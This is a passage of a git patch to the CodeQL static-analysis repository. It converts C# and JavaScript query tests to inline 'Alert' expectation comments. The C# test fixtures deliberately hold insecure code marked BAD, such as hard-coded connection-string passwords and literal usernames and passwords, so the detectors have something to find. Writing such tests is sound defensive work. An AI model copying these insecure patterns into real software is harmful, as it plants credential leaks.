SqlConnection("Password=12345"); + SqlConnection conn = new SqlConnection("Password=12345"); // $ Alert[cs/hardcoded-connection-string-credentials] // BAD: Passing literal User Id to connection string - SqlConnection conn2 = new SqlConnection("User Id=12345"); + SqlConnection conn2 = new SqlConnection("User Id=12345"); // $ Alert[cs/hardcoded-connection-string-credentials] // GOOD: Password is not specified literally SqlConnection conn3 = new SqlConnection("Password=" + LoadPasswordFromSecretConfig() + ";"); @@ -72,7 +72,7 @@ public void ProcessRequest(HttpContext ctx) conn = new SqlConnection($"Password={LoadPasswordFromSecretConfig()}"); // BAD: Hard-coded user - Membership.CreateUser("myusername", "mypassword"); + Membership.CreateUser("myusername", "mypassword"); // $ Alert[cs/hardcoded-credentials] var identityOptions = new IdentityOptions { diff --git a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.expected b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.expected index f6768445fe8e..36abe5531f04 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.expected +++ b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.expected @@ -1,3 +1,12 @@ +#select +| HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | The hard-coded value "myPa55word" flows to $@ which is compared against $@. | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | "myPa55word" | HardcodedCredentials.cs:16:13:16:20 | access to local variable password | access to local variable password | +| HardcodedCredentials.cs:32:19:32:28 | "username" | HardcodedCredentials.cs:32:19:32:28 | "username" | HardcodedCredentials.cs:32:19:32:28 | "username" | The hard-coded value "username" flows to the $@ parameter in $@. | HardcodedCredentials.cs:32:19:32:28 | "username" | name | HardcodedCredentials.cs:30:31:44:13 | object creation of type MembershipUser | object creation of type MembershipUser | +| HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | The hard-coded value "myNewPa55word" flows to the $@ parameter in $@. | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | newPassword | HardcodedCredentials.cs:46:9:46:54 | call to method ChangePassword | call to method ChangePassword | +| HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] | HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] : Byte[] | HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | This hard-coded value flows to the $@ parameter in $@. | HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | rawData | HardcodedCredentials.cs:50:33:52:25 | object creation of type X509Certificate2 | object creation of type X509Certificate2 | +| HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | The hard-coded value "myPa55word" flows to the $@ parameter in $@. | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | password | HardcodedCredentials.cs:50:33:52:25 | object creation of type X509Certificate2 | object creation of type X509Certificate2 | +| HardcodedCredentials.cs:75:31:75:42 | "myusername" | HardcodedCredentials.cs:75:31:75:42 | "myusername" | HardcodedCredentials.cs:75:31:75:42 | "myusername" | The hard-coded value "myusername" flows to the $@ parameter in $@. | HardcodedCredentials.cs:75:31:75:42 | "myusername" | username | HardcodedCredentials.cs:75:9:75:57 | call to method CreateUser | call to method CreateUser | +| HardcodedCredentials.cs:75:45:75:56 | "mypassword" | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | The hard-coded value "mypassword" flows to the $@ parameter in $@. | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | password | HardcodedCredentials.cs:75:9:75:57 | call to method CreateUser | call to method CreateUser | +| TestHardcodedCredentials.cs:26:19:26:28 | "username" | TestHardcodedCredentials.cs:26:19:26:28 | "username" | TestHardcodedCredentials.cs:26:19:26:28 | "username" | The hard-coded value "username" flows to the $@ parameter in $@. | TestHardcodedCredentials.cs:26:19:26:28 | "username" | name | TestHardcodedCredentials.cs:24:31:38:13 | object creation of type MembershipUser | object creation of type MembershipUser | edges | HardcodedCredentials.cs:48:16:48:26 | access to local variable rawCertData : Byte[] | HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | provenance | | | HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] : Byte[] | HardcodedCredentials.cs:48:16:48:26 | access to local variable rawCertData : Byte[] | provenance | | @@ -15,12 +24,3 @@ nodes | TestHardcodedCredentials.cs:21:45:21:56 | "mypassword" | semmle.label | "mypassword" | | TestHardcodedCredentials.cs:26:19:26:28 | "username" | semmle.label | "username" | subpaths -#select -| HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | The hard-coded value "myPa55word" flows to $@ which is compared against $@. | HardcodedCredentials.cs:16:25:16:36 | "myPa55word" | "myPa55word" | HardcodedCredentials.cs:16:13:16:20 | access to local variable password | access to local variable password | -| HardcodedCredentials.cs:32:19:32:28 | "username" | HardcodedCredentials.cs:32:19:32:28 | "username" | HardcodedCredentials.cs:32:19:32:28 | "username" | The hard-coded value "username" flows to the $@ parameter in $@. | HardcodedCredentials.cs:32:19:32:28 | "username" | name | HardcodedCredentials.cs:30:31:44:13 | object creation of type MembershipUser | object creation of type MembershipUser | -| HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | The hard-coded value "myNewPa55word" flows to the $@ parameter in $@. | HardcodedCredentials.cs:46:39:46:53 | "myNewPa55word" | newPassword | HardcodedCredentials.cs:46:9:46:54 | call to method ChangePassword | call to method ChangePassword | -| HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] | HardcodedCredentials.cs:48:30:48:60 | array creation of type Byte[] : Byte[] | HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | This hard-coded value flows to the $@ parameter in $@. | HardcodedCredentials.cs:51:13:51:23 | access to local variable rawCertData | rawData | HardcodedCredentials.cs:50:33:52:25 | object creation of type X509Certificate2 | object creation of type X509Certificate2 | -| HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | The hard-coded value "myPa55word" flows to the $@ parameter in $@. | HardcodedCredentials.cs:52:13:52:24 | "myPa55word" | password | HardcodedCredentials.cs:50:33:52:25 | object creation of type X509Certificate2 | object creation of type X509Certificate2 | -| HardcodedCredentials.cs:75:31:75:42 | "myusername" | HardcodedCredentials.cs:75:31:75:42 | "myusername" | HardcodedCredentials.cs:75:31:75:42 | "myusername" | The hard-coded value "myusername" flows to the $@ parameter in $@. | HardcodedCredentials.cs:75:31:75:42 | "myusername" | username | HardcodedCredentials.cs:75:9:75:57 | call to method CreateUser | call to method CreateUser | -| HardcodedCredentials.cs:75:45:75:56 | "mypassword" | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | The hard-coded value "mypassword" flows to the $@ parameter in $@. | HardcodedCredentials.cs:75:45:75:56 | "mypassword" | password | HardcodedCredentials.cs:75:9:75:57 | call to method CreateUser | call to method CreateUser | -| TestHardcodedCredentials.cs:26:19:26:28 | "username" | TestHardcodedCredentials.cs:26:19:26:28 | "username" | TestHardcodedCredentials.cs:26:19:26:28 | "username" | The hard-coded value "username" flows to the $@ parameter in $@. | TestHardcodedCredentials.cs:26:19:26:28 | "username" | name | TestHardcodedCredentials.cs:24:31:38:13 | object creation of type MembershipUser | object creation of type MembershipUser | diff --git a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.qlref b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.qlref index ce8fa7f9b286..d4792bd2fa24 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.qlref +++ b/csharp/ql/test/query-tests/Security Features/CWE-798/HardcodedCredentials.qlref @@ -1 +1,2 @@ -Security Features/CWE-798/HardcodedCredentials.ql \ No newline at end of file +query: Security Features/CWE-798/HardcodedCredentials.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Security Features/CWE-798/TestHardcodedCredentials.cs b/csharp/ql/test/query-tests/Security Features/CWE-798/TestHardcodedCredentials.cs index fa6d6f2b98af..997c1b7db795 100644 --- a/csharp/ql/test/query-tests/Security Features/CWE-798/TestHardcodedCredentials.cs +++ b/csharp/ql/test/query-tests/Security Features/CWE-798/TestHardcodedCredentials.cs @@ -23,7 +23,7 @@ public void TestUnsafe() // BAD: Create a membership user with hardcoded username MembershipUser user = new MembershipUser( providerName: "provider", - name: "username", + name: "username", // $ Alert[cs/hardcoded-credentials] providerUserKey: "username", email: "foo@bar.com", passwordQuestion: "Hardcoded question.", diff --git a/csharp/ql/test/query-tests/Telemetry/LibraryUsage/ExternalLibraryUsage.qlref b/csharp/ql/test/query-tests/Telemetry/LibraryUsage/ExternalLibraryUsage.qlref index 98a6202f3eb5..918fe540c3bc 100644 --- a/csharp/ql/test/query-tests/Telemetry/LibraryUsage/ExternalLibraryUsage.qlref +++ b/csharp/ql/test/query-tests/Telemetry/LibraryUsage/ExternalLibraryUsage.qlref @@ -1 +1 @@ -Telemetry/ExternalLibraryUsage.ql +query: Telemetry/ExternalLibraryUsage.ql diff --git a/csharp/ql/test/query-tests/Telemetry/LibraryUsage/SupportedExternalTaint.qlref b/csharp/ql/test/query-tests/Telemetry/LibraryUsage/SupportedExternalTaint.qlref index ef9ddfadc00d..a8f8f4965efe 100644 --- a/csharp/ql/test/query-tests/Telemetry/LibraryUsage/SupportedExternalTaint.qlref +++ b/csharp/ql/test/query-tests/Telemetry/LibraryUsage/SupportedExternalTaint.qlref @@ -1 +1 @@ -Telemetry/SupportedExternalTaint.ql +query: Telemetry/SupportedExternalTaint.ql diff --git a/csharp/ql/test/query-tests/Telemetry/LibraryUsage/UnsupportedExternalAPIs.qlref b/csharp/ql/test/query-tests/Telemetry/LibraryUsage/UnsupportedExternalAPIs.qlref index b89f0a48e2e6..da704d4cbbe9 100644 --- a/csharp/ql/test/query-tests/Telemetry/LibraryUsage/UnsupportedExternalAPIs.qlref +++ b/csharp/ql/test/query-tests/Telemetry/LibraryUsage/UnsupportedExternalAPIs.qlref @@ -1 +1 @@ -Telemetry/UnsupportedExternalAPIs.ql +query: Telemetry/UnsupportedExternalAPIs.ql diff --git a/csharp/ql/test/query-tests/Telemetry/SupportedExternalApis/SupportedExternalApis.qlref b/csharp/ql/test/query-tests/Telemetry/SupportedExternalApis/SupportedExternalApis.qlref index 2e12499cf62b..f3e231b8a7aa 100644 --- a/csharp/ql/test/query-tests/Telemetry/SupportedExternalApis/SupportedExternalApis.qlref +++ b/csharp/ql/test/query-tests/Telemetry/SupportedExternalApis/SupportedExternalApis.qlref @@ -1 +1 @@ -Telemetry/SupportedExternalApis.ql +query: Telemetry/SupportedExternalApis.ql diff --git a/csharp/ql/test/query-tests/Telemetry/SupportedExternalSinks/SupportedExternalSinks.qlref b/csharp/ql/test/query-tests/Telemetry/SupportedExternalSinks/SupportedExternalSinks.qlref index e8bd57fad506..d454ef226b9d 100644 --- a/csharp/ql/test/query-tests/Telemetry/SupportedExternalSinks/SupportedExternalSinks.qlref +++ b/csharp/ql/test/query-tests/Telemetry/SupportedExternalSinks/SupportedExternalSinks.qlref @@ -1 +1 @@ -Telemetry/SupportedExternalSinks.ql \ No newline at end of file +query: Telemetry/SupportedExternalSinks.ql diff --git a/csharp/ql/test/query-tests/Telemetry/SupportedExternalSources/SupportedExternalSources.qlref b/csharp/ql/test/query-tests/Telemetry/SupportedExternalSources/SupportedExternalSources.qlref index c6819c7775f4..f6f3f1b972d1 100644 --- a/csharp/ql/test/query-tests/Telemetry/SupportedExternalSources/SupportedExternalSources.qlref +++ b/csharp/ql/test/query-tests/Telemetry/SupportedExternalSources/SupportedExternalSources.qlref @@ -1 +1 @@ -Telemetry/SupportedExternalSources.ql +query: Telemetry/SupportedExternalSources.ql diff --git a/csharp/ql/test/query-tests/UnusedPropertyValue/UnusedPropertyValue.cs b/csharp/ql/test/query-tests/UnusedPropertyValue/UnusedPropertyValue.cs index aabe43f2258d..bb6bf7e264bf 100644 --- a/csharp/ql/test/query-tests/UnusedPropertyValue/UnusedPropertyValue.cs +++ b/csharp/ql/test/query-tests/UnusedPropertyValue/UnusedPropertyValue.cs @@ -6,12 +6,12 @@ class Program bool Prop1 { - set { x = true; } // BAD + set { x = true; } // BAD // $ Alert } bool Prop2 { - set { } // BAD + set { } // BAD // $ Alert } bool Prop3 @@ -55,7 +55,7 @@ class C3 : C2 { public bool Prop1 { - set { } // BAD: not override + set { } // BAD: not override // $ Alert } public override bool Prop2 diff --git a/csharp/ql/test/query-tests/UnusedPropertyValue/UnusedPropertyValue.qlref b/csharp/ql/test/query-tests/UnusedPropertyValue/UnusedPropertyValue.qlref index 199133fb534c..ca84e54c8278 100644 --- a/csharp/ql/test/query-tests/UnusedPropertyValue/UnusedPropertyValue.qlref +++ b/csharp/ql/test/query-tests/UnusedPropertyValue/UnusedPropertyValue.qlref @@ -1 +1,2 @@ -Language Abuse/UnusedPropertyValue.ql \ No newline at end of file +query: Language Abuse/UnusedPropertyValue.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/UseBraces/UseBraces.cs b/csharp/ql/test/query-tests/UseBraces/UseBraces.cs index c6036255062d..d5abf8fb90cc 100644 --- a/csharp/ql/test/query-tests/UseBraces/UseBraces.cs +++ b/csharp/ql/test/query-tests/UseBraces/UseBraces.cs @@ -29,7 +29,7 @@ static void Main(string[] args) g(); // BAD if (1 == 1) - f(); g(); // BAD + f(); g(); // BAD // $ Alert // If-then-else statement @@ -63,7 +63,7 @@ static void Main(string[] args) f(); } else - f(); g(); // BAD + f(); g(); // BAD // $ Alert // While statement @@ -83,7 +83,7 @@ static void Main(string[] args) g(); // GOOD while (x > 1) - f(); g(); // BAD + f(); g(); // BAD // $ Alert while (x > 1) if (x != null) x = 1; @@ -111,7 +111,7 @@ static void Main(string[] args) g(); // BAD for (int i = 0; i < 10; ++i) - f(); g(); // BAD + f(); g(); // BAD // $ Alert // Foreach statement @@ -130,7 +130,7 @@ static void Main(string[] args) g(); // BAD foreach (var b in branches) - f(); g(); // BAD + f(); g(); // BAD // $ Alert // Nested ifs if (x > 1) diff --git a/csharp/ql/test/query-tests/UseBraces/UseBraces.qlref b/csharp/ql/test/query-tests/UseBraces/UseBraces.qlref index 5d1d4a063882..e89389461d72 100644 --- a/csharp/ql/test/query-tests/UseBraces/UseBraces.qlref +++ b/csharp/ql/test/query-tests/UseBraces/UseBraces.qlref @@ -1 +1,2 @@ -Likely Bugs/Statements/UseBraces.ql +query: Likely Bugs/Statements/UseBraces.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Useless Code/PointlessForwardingMethod/PointlessForwardingMethod.cs b/csharp/ql/test/query-tests/Useless Code/PointlessForwardingMethod/PointlessForwardingMethod.cs index 096372e40985..04a2b3b68cad 100644 --- a/csharp/ql/test/query-tests/Useless Code/PointlessForwardingMethod/PointlessForwardingMethod.cs +++ b/csharp/ql/test/query-tests/Useless Code/PointlessForwardingMethod/PointlessForwardingMethod.cs @@ -8,7 +8,7 @@ class C : I public void f(int x) { } // BAD: This method is a forwarder - public void f() + public void f() // $ Alert { f(1); } @@ -38,7 +38,7 @@ void h() { } void i() { } // BAD: Forwarding method - void i(int a) + void i(int a) // $ Alert { i(); } diff --git a/csharp/ql/test/query-tests/Useless Code/PointlessForwardingMethod/PointlessForwardingMethod.qlref b/csharp/ql/test/query-tests/Useless Code/PointlessForwardingMethod/PointlessForwardingMethod.qlref index 2e42cbc75022..435314fa3738 100644 --- a/csharp/ql/test/query-tests/Useless Code/PointlessForwardingMethod/PointlessForwardingMethod.qlref +++ b/csharp/ql/test/query-tests/Useless Code/PointlessForwardingMethod/PointlessForwardingMethod.qlref @@ -1 +1,2 @@ -Useless code/PointlessForwardingMethod.ql +query: Useless code/PointlessForwardingMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/WriteOnlyContainer/WriteOnlyContainer.cs b/csharp/ql/test/query-tests/WriteOnlyContainer/WriteOnlyContainer.cs index 6d870cad08bf..67e67ad472b9 100644 --- a/csharp/ql/test/query-tests/WriteOnlyContainer/WriteOnlyContainer.cs +++ b/csharp/ql/test/query-tests/WriteOnlyContainer/WriteOnlyContainer.cs @@ -7,7 +7,7 @@ public class ContainerTest // Test 1: Variable scopes // Test 1a: Private field - private IList c1a = new List { 1, 2 }; // BAD: private + private IList c1a = new List { 1, 2 }; // BAD: private // $ Alert // Test 1b: protected field protected IList c1b = new List { 1, 2 }; // GOOD: protected @@ -16,7 +16,7 @@ public class ContainerTest public IList c1c = new List { 1, 2 }; // GOOD: public // Test 1d: internal field - internal IList c1d = new List { 1, 2 }; // BAD: internal + internal IList c1d = new List { 1, 2 }; // BAD: internal // $ Alert void TestScopes() { @@ -26,7 +26,7 @@ void TestScopes() c1d.Add(4); // Test 1e: Local variable - IList c1e = new List { 1, 2 }; // BAD: local + IList c1e = new List { 1, 2 }; // BAD: local // $ Alert c1e.Add(5); } @@ -35,7 +35,7 @@ void TestScopes() void TestMethodNames() { // Test 2a: Writeonly method names - IList c2a = new List { 1, 2 }; // BAD: writeonly methods + IList c2a = new List { 1, 2 }; // BAD: writeonly methods // $ Alert c2a.Add(1); c2a.Clear(); c2a.Insert(1, 2); @@ -47,14 +47,14 @@ void TestMethodNames() bool b = c2b.Contains(1); // Test 2c: Other method names - var c2c = new Stack(); // BAD + var c2c = new Stack(); // BAD // $ Alert c2c.Push(1); - var c2d = new BitArray(10); // BAD + var c2d = new BitArray(10); // BAD // $ Alert c2d.Set(1, true); c2d.SetAll(false); - var c2j = new LinkedList(); // BAD + var c2j = new LinkedList(); // BAD // $ Alert c2j.AddFirst(1); c2j.AddLast(2); c2j.RemoveFirst(); @@ -100,7 +100,7 @@ IList this[int i] void TestAccessTypes() { // 3a: Unused - IList c3a = new List { 4, 5 }; // BAD + IList c3a = new List { 4, 5 }; // BAD // $ Alert // 3b: Pass to function IList c3b = new List { }; // GOOD: used @@ -115,7 +115,7 @@ void TestAccessTypes() // Test 4: Initialization type - private IList c4a; // BAD: even though uninitialized + private IList c4a; // BAD: even though uninitialized // $ Alert void TestInitializationTypes() { @@ -123,11 +123,11 @@ void TestInitializationTypes() c4a.Add(1); // Test 4b: Constructed from new - var c4b = new List(); // BAD + var c4b = new List(); // BAD // $ Alert c4b.Add(1); // Test 4c: List initialized - var c4c = new List { 2, 3, 4 }; // BAD + var c4c = new List { 2, 3, 4 }; // BAD // $ Alert c4c.Add(1); // Test 4d: Constructed from other expression @@ -147,7 +147,7 @@ void TestInitializationTypes() void TestAssignment() { // Assigned from new container - IList c5a; // BAD + IList c5a; // BAD // $ Alert c5a = new List(); c5a.Add(1); @@ -162,7 +162,7 @@ void TestAssignment() c5d = c5c; // Assigned in an expression somewhere - IList c5e = new List(); // BAD: assigned in expr + IList c5e = new List(); // BAD: assigned in expr // $ Alert for (int i = 0; i < 10; c5e = new List(), ++i) c5e.Add(1); @@ -183,67 +183,67 @@ void TestCollections() var c6a = new NonCollection(); // GOOD: not a collection c6a.Add(1); - var c6b = new ArrayList(); // BAD + var c6b = new ArrayList(); // BAD // $ Alert c6b.Add(1); - var c6c = new BitArray(32); // BAD + var c6c = new BitArray(32); // BAD // $ Alert c6c.SetAll(true); - var c6d = new Hashtable(); // BAD + var c6d = new Hashtable(); // BAD // $ Alert c6d.Add(1, 2); - var c6e = new Queue(); // BAD + var c6e = new Queue(); // BAD // $ Alert c6e.Enqueue(1); - var c6f = new SortedList(); // BAD + var c6f = new SortedList(); // BAD // $ Alert c6f.Add(1, 2); - var c6g = new Stack(); // BAD + var c6g = new Stack(); // BAD // $ Alert c6g.Push(1); - var c6h = new Dictionary(); // BAD + var c6h = new Dictionary(); // BAD // $ Alert c6h.Add(1, 2); - var c6i = new HashSet(); // BAD + var c6i = new HashSet(); // BAD // $ Alert c6i.Add(1); - var c6j = new LinkedList(); // BAD + var c6j = new LinkedList(); // BAD // $ Alert c6j.AddFirst(1); - var c6k = new List(); // BAD + var c6k = new List(); // BAD // $ Alert c6k.Add(1); - var c6l = new Queue(); // BAD + var c6l = new Queue(); // BAD // $ Alert c6l.Enqueue(1); - var c6m = new SortedDictionary(); // BAD + var c6m = new SortedDictionary(); // BAD // $ Alert c6m.Add(1, 2); - var c6n = new SortedList(); // BAD + var c6n = new SortedList(); // BAD // $ Alert c6n.Add(1, 2); - var c6o = new SortedDictionary(); // BAD + var c6o = new SortedDictionary(); // BAD // $ Alert c6o.Add(1, 2); - var c6p = new SortedSet(); // BAD + var c6p = new SortedSet(); // BAD // $ Alert c6p.Add(1); - var c6q = new Stack(); // BAD + var c6q = new Stack(); // BAD // $ Alert c6q.Push(1); - ICollection c6u = new List(); // BAD + ICollection c6u = new List(); // BAD // $ Alert c6u.Add(1); - IDictionary c6v = new Dictionary(); // BAD + IDictionary c6v = new Dictionary(); // BAD // $ Alert c6v.Add(1, 2); IEnumerable c6w = new List(); // GOOD c6w.GetEnumerator(); - IList c6x = new List(); // BAD + IList c6x = new List(); // BAD // $ Alert c6x.Add(12); - ISet c6y = new HashSet(); // BAD + ISet c6y = new HashSet(); // BAD // $ Alert c6y.Add(1); } @@ -264,7 +264,7 @@ void TestDynamicAccess() t.InvokeMember("Add", System.Reflection.BindingFlags.InvokeMethod, null, c7c, new Object[] { 1 }); } - IList c8a = new List(); // BAD: no attribute + IList c8a = new List(); // BAD: no attribute // $ Alert [Obsolete()] IList c8b = new List(); // GOOD: has attribute diff --git a/csharp/ql/test/query-tests/WriteOnlyContainer/WriteOnlyContainer.qlref b/csharp/ql/test/query-tests/WriteOnlyContainer/WriteOnlyContainer.qlref index ddd3e9fb1cb8..9d2057a3d375 100644 --- a/csharp/ql/test/query-tests/WriteOnlyContainer/WriteOnlyContainer.qlref +++ b/csharp/ql/test/query-tests/WriteOnlyContainer/WriteOnlyContainer.qlref @@ -1 +1,2 @@ -Likely Bugs/Collections/WriteOnlyContainer.ql +query: Likely Bugs/Collections/WriteOnlyContainer.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.cs b/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.cs index 1b550cacf8ac..a4541e2ba24d 100644 --- a/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.cs +++ b/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.cs @@ -3,9 +3,9 @@ class Test static void Main(string[] args) { // BAD - c3.Equals(c4); - c2.Equals(c3); - c7.Equals(c6); + c3.Equals(c4); // $ Alert + c2.Equals(c3); // $ Alert + c7.Equals(c6); // $ Alert // GOOD c1.Equals(c2); diff --git a/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.qlref b/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.qlref index 96eae4e2eac5..91b47c6ddd94 100644 --- a/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.qlref +++ b/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.qlref @@ -1 +1,2 @@ -Likely Bugs/IncomparableEquals.ql \ No newline at end of file +query: Likely Bugs/IncomparableEquals.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.cs b/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.cs index f717fe662c6b..756b667a055d 100644 --- a/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.cs +++ b/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.cs @@ -14,9 +14,9 @@ void test() result = (object)unknownValue = someValue; // BAD: Explicit cast - result = (object)unknownValue == (object)someValue; + result = (object)unknownValue == (object)someValue; // $ Alert // BAD: Type information known - result = this == (object)this; + result = this == (object)this; // $ Alert } } diff --git a/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.qlref b/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.qlref index 6f834d6d6548..e47228487204 100644 --- a/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.qlref +++ b/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.qlref @@ -1 +1,2 @@ -Likely Bugs/ObjectComparison.ql \ No newline at end of file +query: Likely Bugs/ObjectComparison.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/utils/modeleditor/ApplicationModeEndpoints.qlref b/csharp/ql/test/utils/modeleditor/ApplicationModeEndpoints.qlref index 4787fa5d4b2e..1255164237c6 100644 --- a/csharp/ql/test/utils/modeleditor/ApplicationModeEndpoints.qlref +++ b/csharp/ql/test/utils/modeleditor/ApplicationModeEndpoints.qlref @@ -1 +1 @@ -utils/modeleditor/ApplicationModeEndpoints.ql \ No newline at end of file +query: utils/modeleditor/ApplicationModeEndpoints.ql diff --git a/csharp/ql/test/utils/modeleditor/FrameworkModeEndpoints.qlref b/csharp/ql/test/utils/modeleditor/FrameworkModeEndpoints.qlref index 5ae87455edd6..ec216021687b 100644 --- a/csharp/ql/test/utils/modeleditor/FrameworkModeEndpoints.qlref +++ b/csharp/ql/test/utils/modeleditor/FrameworkModeEndpoints.qlref @@ -1 +1 @@ -utils/modeleditor/FrameworkModeEndpoints.ql \ No newline at end of file +query: utils/modeleditor/FrameworkModeEndpoints.ql From d75113de93d0a79c515b27a6f122dc39fc480661 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Wed, 10 Jun 2026 22:57:33 +0200 Subject: [PATCH 04/15] JS --- .../CWE-094-dataURL/CodeInjection.expected | 10 ++--- .../CWE-094-dataURL/CodeInjection.qlref | 3 +- .../Security/CWE-094-dataURL/test.js | 12 +++--- .../EnvValueAndKeyInjection.expected | 6 +-- .../EnvValueAndKeyInjection.qlref | 3 +- .../CWE-099/EnvValueAndKeyInjection/test.js | 6 +-- .../EnvValueInjection.expected | 8 ++-- .../EnvValueInjection/EnvValueInjection.qlref | 3 +- .../CWE-099/EnvValueInjection/test.js | 8 ++-- .../CWE-347/localsource/JsonWebToken.js | 10 ++--- ...JwtWithoutVerificationLocalSource.expected | 14 +++---- ...odeJwtWithoutVerificationLocalSource.qlref | 3 +- .../Security/CWE-347/localsource/jose.js | 4 +- .../Security/CWE-347/localsource/jwtDecode.js | 4 +- .../Security/CWE-347/localsource/jwtSimple.js | 4 +- .../CWE-347/remotesource/JsonWebToken.js | 10 ++--- .../decodeJwtWithoutVerification.expected | 14 +++---- .../decodeJwtWithoutVerification.qlref | 3 +- .../Security/CWE-347/remotesource/jose.js | 4 +- .../CWE-347/remotesource/jwtDecode.js | 4 +- .../CWE-347/remotesource/jwtSimple.js | 4 +- .../Security/CWE-918/SSRF.expected | 42 +++++++++---------- .../experimental/Security/CWE-918/SSRF.qlref | 3 +- .../Security/CWE-918/check-domain.js | 6 +-- .../Security/CWE-918/check-middleware.js | 2 +- .../Security/CWE-918/check-path.js | 10 ++--- .../Security/CWE-918/check-regex.js | 12 +++--- .../Security/CWE-918/check-validator.js | 14 +++---- .../MultipleArgumentsToSetConstructor.qlref | 3 +- .../MultipleArgumentsToSetConstructorBad.js | 2 +- .../MultipleArgumentsToSetConstructor/tst.js | 2 +- .../UnpromotedRouteHandlerCandidate.qlref | 3 +- .../UnpromotedRouteSetupCandidate.qlref | 3 +- .../frameworks/HTTP-heuristics/src/hapi.js | 2 +- .../frameworks/HTTP-heuristics/src/nodejs.js | 6 +-- .../HTTP-heuristics/src/route-objects.js | 14 +++---- .../frameworks/HTTP-heuristics/src/tst.js | 42 +++++++++---------- .../frameworks/Templating/CodeInjection.qlref | 2 +- .../AlertSuppression/AlertSuppression.qlref | 2 +- .../Diagnostics/ExtractedFiles.qlref | 2 +- .../Diagnostics/ExtractionErrors.qlref | 2 +- .../ExternalDependencies.qlref | 2 +- .../Metrics/FLinesOfCode/FLinesOfCode.qlref | 2 +- .../query-tests/Summary/LinesOfCode.qlref | 2 +- .../query-tests/Summary/LinesOfUserCode.qlref | 2 +- .../query-tests/definitions/definitions.qlref | 2 +- .../filters/ClassifyFiles/ClassifyFiles.qlref | 2 +- 47 files changed, 166 insertions(+), 157 deletions(-) diff --git a/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.expected b/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.expected index 0385389e73c1..c4f42ba87154 100644 --- a/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.expected +++ b/javascript/ql/test/experimental/Security/CWE-094-dataURL/CodeInjection.expected @@ -1,3 +1,8 @@ +#select +| test.js:7:16:7:25 | payloadURL | test.js:5:21:5:44 | req.que ... rameter | test.js:7:16:7:25 | payloadURL | This command line depends on a $@. | test.js:5:21:5:44 